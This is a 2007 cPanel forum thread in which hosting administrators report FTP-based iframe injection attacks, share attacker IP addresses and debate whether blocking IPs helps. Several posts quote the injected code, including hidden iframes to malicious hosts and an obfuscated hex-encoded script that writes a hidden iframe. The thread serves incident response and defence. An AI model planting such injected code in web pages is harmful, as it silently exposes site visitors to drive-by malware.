The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

IP addresses from IFrame Hacks

Discussion in 'General Discussion' started by noimad1, Oct 6, 2007.

  1. noimad1

    noimad1 Well-Known Member

    Joined:
    Mar 27, 2003
    Messages:
    627
    Likes Received:
    0
    Trophy Points:
    16
    #1 noimad1, Oct 6, 2007
    Last edited: Oct 6, 2007
  2. Puggs

    Puggs Member

    Joined:
    Oct 1, 2007
    Messages:
    13
    Likes Received:
    0
    Trophy Points:
    1
    Hi

    66.36.241.185 8:30pm Australian Eastern Standard Time +10:00 1st Oct
    66.36.241.185 4:20am Australian Eastern Standard Time +10:00 2st Oct
     
  3. simplybe

    simplybe Well-Known Member

    Joined:
    Nov 29, 2002
    Messages:
    153
    Likes Received:
    0
    Trophy Points:
    16
    exactly the same here, same time , date & ip
     
  4. mctDarren

    mctDarren Well-Known Member

    Joined:
    Jan 6, 2004
    Messages:
    664
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    New Jersey
    cPanel Access Level:
    Root Administrator
    This thread should probably be made stickied... gl to all those looking for an answer.
     
  5. noimad1

    noimad1 Well-Known Member

    Joined:
    Mar 27, 2003
    Messages:
    627
    Likes Received:
    0
    Trophy Points:
    16

    Interesting...Well that makes me feel a tiny bit better that this might not be a server compromise...
     
  6. simplybe

    simplybe Well-Known Member

    Joined:
    Nov 29, 2002
    Messages:
    153
    Likes Received:
    0
    Trophy Points:
    16
    new ip 72.29.95.226 same method as before
     
  7. d_t

    d_t Well-Known Member

    Joined:
    Sep 20, 2003
    Messages:
    243
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Bucharest
    81.95.149.75 - October, 2 2007
    (client confirmed he used FTP from an infected PC the day before)
     
  8. wkdwich

    wkdwich Well-Known Member

    Joined:
    Apr 11, 2005
    Messages:
    105
    Likes Received:
    0
    Trophy Points:
    16
    Since June, the ones I have caught:


    12.130.132.229
    132.239.235.55
    195.133.109.227
    202.151.177.83
    203.121.67.164
    203.223.159.210
    210.188.204.80
    211.118.175.22
    211.63.65.46
    217.118.82.41
    217.170.77.210
    217.195.87.197
    221.201.100.253
    24.82.147.206
    58.65.235.105
    61.183.247.7
    69.11.37.86
    69.41.162.77
    69.50.180.186
    71.242.248.228
    72.37.179.44
    80.81.208.67
    81.177.4.34
    82.75.59.65
    84.164.206.37
     
  9. rvskin

    rvskin Well-Known Member
    PartnerNOC

    Joined:
    Feb 19, 2003
    Messages:
    400
    Likes Received:
    1
    Trophy Points:
    18
    Here is my collection.

    66.246.218.145 # Sep 09 2007
    84.16.252.163 # Aug 29 2007
    194.83.36.2 # Aug 30 2007
    69.41.162.77 # Sep 27 2007
    213.27.26.11 # Sep 27 2007
    116.0.103.111 # Oct 9 2007
    202.164.52.199 # Oct 9 2007
     
  10. mooony

    mooony Well-Known Member

    Joined:
    Nov 9, 2002
    Messages:
    82
    Likes Received:
    0
    Trophy Points:
    6
    66.36.241.185 on 8 servers.

    Ronald
     
  11. ToddShipway

    ToddShipway Well-Known Member

    Joined:
    Nov 13, 2006
    Messages:
    300
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Houston, TX
    Thanks for the information.

    Keep it coming. :)
     
  12. Imai

    Imai Well-Known Member

    Joined:
    Aug 11, 2003
    Messages:
    45
    Likes Received:
    0
    Trophy Points:
    6
    81.95.150.178 on October 8

    <IFRAME name='StatPage' src='http://www.911traff.com/trf/traf.php' width=5 height=5 style='display:none'></IFRAME>

    looks like a one off case as I am still checking the other accounts and logs
     
    #12 Imai, Oct 13, 2007
    Last edited: Oct 13, 2007
  13. sarhosting

    sarhosting Well-Known Member

    Joined:
    Oct 1, 2007
    Messages:
    164
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    United States
    cPanel Access Level:
    Root Administrator
    Twitter:
  14. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    14,461
    Likes Received:
    195
    Trophy Points:
    63
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    Twitter:

    I don't want to sound pessimistic here, or take this thread too far off topic, but is posting these IPs really going to be helpful? Anyone who watches their logs can tell you the hits just keep on coming, block one another pops up. Block 130 (my max for CSF entries to blocked list) another 130 more blocked next month.

    Soon as they are found out at hopone or ipowerweb or rbnnetwork or netdirekt.de or hostfresh.com or any one of a zillion other places, they're already setup on someone else's server continuing to do what they do.

    Trying to track down how its happening is a good thing, keeping track of IPs may be good as well, but this'll go on forever. (the thread)

    Wouldn't it be more advantageous to all concerned if we as system administrators were sharing our security tips instead? A nice long thread with the top security tips would surely be more helpful, IMHO of course.

    For one example, many have Fantastico installed, but did you know that just because Fantastico tells you all files are up to date, and all installations are listed as up to date, that doesn't mean squat? Users will install components to Joomla that are very buggy and can be cracked:
    http://help.joomla.org/component/option,com_easyfaq/task,view/id,186/Itemid,268/

    That's just one example, there are thousands of examples we could be sharing that I think might really be more helpful than this list of IPs.


    We're all in this boat together here as cPanel admins, and while sharing tips might be actually helping your competition in this hosting business, at the same time those who have no clues about security are a huge part of the reason others of us are having problems.

    Some kid (no offense kids) gets his own cPanel server, gives all his buddies free accounts and they get broke into because that kid didn't secure his server properly and his buddies are so excited to have a free account they install everything under the sun without knowing the consequences. And the end result is what we're all discussing here.

    cPanel is great stuff, but installing it and using the built in security is not enough. Not by a long shot. I watch my logs via WHM daily, using logview, I get system logs by mail every hour, and I can tell you the hits just keep on coming, every hour every day every month.

    You can block IPs until the cows come home, that's not going to keep you secure.

    Anyway, sorry for the rant, just my 2.
     
  15. rpmws

    rpmws Well-Known Member

    Joined:
    Aug 14, 2001
    Messages:
    1,824
    Likes Received:
    5
    Trophy Points:
    38
    Location:
    back woods of NC, USA
    you are correct !! I agree with you almost 100% with everything you said in general except one thing. These ftp login defacements or whatever you want to call them, come from legit logins that have been snatched from locally exploited machines. (i think) (or a compromised billing system that stores logins) .At least that is what I have always thought. If that is the case ..then the only way to keep them out is to either block or disable FTP or block the known IP(s) they came in from.
     
  16. ToddShipway

    ToddShipway Well-Known Member

    Joined:
    Nov 13, 2006
    Messages:
    300
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Houston, TX
    Feel free to start a new post where admins can post security tips, helpful notes etc.

    We are asking for attacking IPs in this thread for information gathering purposes. We aren't creating a list of IP's to delete or anything like that. We just need a few IP's that are known to attack several different servers to help us gain an understanding about whats occurring during the attacks and how they are being propagated. :)
     
  17. mooony

    mooony Well-Known Member

    Joined:
    Nov 9, 2002
    Messages:
    82
    Likes Received:
    0
    Trophy Points:
    6
    I have this morning 4 servers infected with iframes. These accounts where accessed by ftp.

    ip: 58.65.239.10

    PHP:
    <iframe src='http://ltraffic.biz/resource.php?id=4531&user=Nikson' width='1' height='1' style='visibility: hidden;'></iframe>
    I hope this helps.

    Ronald
     
  18. sehh

    sehh Well-Known Member

    Joined:
    Feb 11, 2006
    Messages:
    579
    Likes Received:
    5
    Trophy Points:
    18
    Location:
    Europe
    we've seen lots of ftp attacks from: 72.95.215.3
     
  19. mtindor

    mtindor Well-Known Member

    Joined:
    Sep 14, 2004
    Messages:
    1,281
    Likes Received:
    37
    Trophy Points:
    48
    Location:
    inside a catfish
    cPanel Access Level:
    Root Administrator
    What percentage of accounts on each server? or are you saying EVERY account on four servers had this happen?

    Mike
     
  20. d_t

    d_t Well-Known Member

    Joined:
    Sep 20, 2003
    Messages:
    243
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Bucharest
    FTP connection with user password from: 77.221.133.186

    code added to index.htnl
    Code:
    <iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v4757fc58cd991(v4757fc58ce18a){ function v4757fc58ce999 () {return 16;} return(parseInt(v4757fc58ce18a,v4757fc58ce999()));}function v4757fc58cf989(v4757fc58d0183){ var v4757fc58d1171=2; var v4757fc58d097a='';for(v4757fc58d0d7d=0; v4757fc58d0d7d<v4757fc58d0183.length; v4757fc58d0d7d+=v4757fc58d1171){ v4757fc58d097a+=(String.fromCharCode(v4757fc58cd991(v4757fc58d0183.substr(v4757fc58d0d7d, v4757fc58d1171))));}return v4757fc58d097a;} document.write(v4757fc58cf989('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D633737386536356239373065207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313936353936292B273031665C272077696474683D353136206865696768743D333831207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
    code contain links to:
    Code:
    http://77.221.133.188/.if/go.html?19427401f
    http://77.221.133.188/.dif/go.php?sid=1
    http://77.221.133.189/.sp/in.cgi?p=t
    
     
Loading...

Share This Page